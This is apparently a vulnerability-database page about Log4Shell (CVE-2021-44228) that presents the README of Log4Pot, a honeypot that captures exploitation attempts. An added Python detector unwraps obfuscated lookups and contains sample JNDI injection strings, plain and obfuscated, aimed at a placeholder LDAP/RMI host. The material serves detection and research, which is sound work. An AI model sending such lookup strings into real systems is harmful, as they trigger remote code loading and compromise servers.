
CVE-2021-44228 PoC — Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints

Associated Vulnerability
Title: Apache Log4j2 JNDI features do not protect against attacker controlled LDAP and other JNDI related endpoints (CVE-2021-44228)
Description: Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.
Description
A honeypot for the Log4Shell vulnerability (CVE-2021-44228).
Readme
# Log4Pot

A honeypot for the Log4Shell vulnerability (CVE-2021-44228).

License: [GPLv3.0](https://www.gnu.org/licenses/gpl-3.0.html)

## Features

* Listen on various ports for Log4Shell exploitation.
* Detect exploitation in request line and headers.
* Download exploit payloads recursively.
* Log to file and Azure blob storage.

## Usage

1. Install Poetry: `curl -sSL https://raw.githubusercontent.com/python-poetry/poetry/master/get-poetry.py | python3 -`
2. Fetch this GitHub repository: `git clone https://github.com/thomaspatzke/Log4Pot.git`
3. Change into the local copy: `cd Log4Pot`
4. Install pycurl dependencies (Debian / Ubuntu): `apt install libcurl4-openssl-dev libssl-dev python3-dev build-essential`
5. Install python dependencies: `poetry install`
6. Put parameters into `log4pot.conf`; see `poetry run python log4pot.py --help` for an overview of the available options.
7. Run: `poetry run python log4pot.py @log4pot.conf`

Alternatively, you can also run log4pot without external dependencies:
```
$ python log4pot.py @log4pot.conf
```
This will run log4pot without support for logging to Azure blob storage.

## Redirecting traffic / non-container setup

To redirect traffic for ports 80 and 443 to Log4Pot, use the following iptables commands:

`iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080`

`iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8443`

## Log Analysis Tool

The script `log4pot-loganalyzer.py` extracts all payloads, decodes them with the current decoder and builds a timeline from both. Use it as follows:

```
python log4pot-loganalyzer.py -o <output directory> <input log files>
```

## Analyzing Logs with JQ

List payloads from exploitation attempts:
```
select(.type == "exploit") | .payload
```

Decode all base64-encoded payloads from JNDI exploit:
```
select(.type == "exploit" and (.payload | contains("Base64"))) | .payload | sub(".*/Base64/"; "") | sub("}$"; "") | @base64d
```

Extract all SHA256 hashes from files downloaded from URLs:
```
[ .[] | select(.type == "payload") | .urls | select((. | length) > 0) | to_entries | .[].value | select((. | length) == 64) ] | unique | .[]
```
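A small detector for the "detect exploitation in request line and headers" feature, as an added example that is not part of Log4Pot's own code: it canonicalises nested `${...}` lookups (the job the repository's deobfuscator performs, re-implemented here independently) and flags every request line or header whose canonical form still contains a JNDI lookup. The sample request, `honeypot.invalid` and `EXAMPLE-HOST` are constructed placeholders.

```python
import re
from typing import Dict, List, Optional, Tuple

# Innermost ${...} lookup: a body with no further "${" or "}" inside it.
INNER_LOOKUP = re.compile(r"\$\{([^{}]*)\}")
JNDI_LOOKUP = re.compile(r"\$\{\s*jndi:", re.IGNORECASE)


def resolve_lookup(body: str) -> Optional[str]:
    """Canonical text for one innermost lookup body, or None to leave it in place."""
    lowered = body.lower()
    if lowered.startswith("jndi:"):
        return None  # terminal form: this is what the honeypot wants to see
    if lowered.startswith("lower:"):
        return body[len("lower:"):].lower()
    if ":-" in body:
        return body.split(":-", 1)[1]  # ${name:-default}: unknown lookup yields its default
    return None


def deobfuscate(text: str, max_rounds: int = 32) -> str:
    """Resolve innermost lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        changed = False

        def repl(match) -> str:
            nonlocal changed
            resolved = resolve_lookup(match.group(1))
            if resolved is None:
                return match.group(0)
            changed = True
            return resolved

        text = INNER_LOOKUP.sub(repl, text)
        if not changed:
            break
    return text


def scan_request(request_line: str, headers: Dict[str, str]) -> List[Tuple[str, str]]:
    """Return (location, canonical value) for every field that carries a JNDI lookup."""
    fields = [("request-line", request_line)] + [(f"header:{k}", v) for k, v in headers.items()]
    return [(loc, canon) for loc, v in fields if JNDI_LOOKUP.search(canon := deobfuscate(v))]


# Constructed sample request as the honeypot would receive it; EXAMPLE-HOST is a placeholder.
SAMPLE_REQUEST_LINE = "GET /?q=${jndi:ldap://EXAMPLE-HOST/a} HTTP/1.1"
SAMPLE_HEADERS = {
    "Host": "honeypot.invalid",
    "User-Agent": "${${lower:j}ndi:${lower:L}dap://EXAMPLE-HOST/b}",
    "X-Api-Version": "${${::-j}${::-n}di:rmi://EXAMPLE-HOST/c}",
}
```

Each hit keeps the canonical lookup string, which is the value worth writing to the `exploit` log record and feeding to the base64 decoding step above.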
File Snapshot

```
[4.0K] /data/pocs/a66cf4f6ff7cf896aff089983ba5a81de79a7589
├── [ 10] default-url-allowlist
├── [ 144] default-url-denylist
├── [ 34K] LICENSE
├── [4.0K] log4pot
│   ├── [2.3K] deobfuscator.py
│   ├── [1.0K] expression_parser.py
│   ├── [ 0] __init__.py
│   ├── [5.6K] loganalyzer.py
│   ├── [9.8K] payloader.py
│   └── [2.2K] s3.py
├── [ 284] log4pot.conf.example
├── [4.4K] log4pot-loganalyzer.py
├── [ 10K] log4pot-server.py
├── [ 36K] poetry.lock
├── [ 460] pyproject.toml
├── [2.1K] README.md
├── [4.0K] responses
│   ├── [ 64] default.json
│   ├── [ 12K] sap-netweaver.html
│   ├── [1.9K] tomcat-default.html
│   └── [3.8K] vmware-esx-4.html
└── [4.0K] test
    ├── [1.2K] test_deobfuscation.py
    └── [ 482] test_payloader.py

3 directories, 21 files
```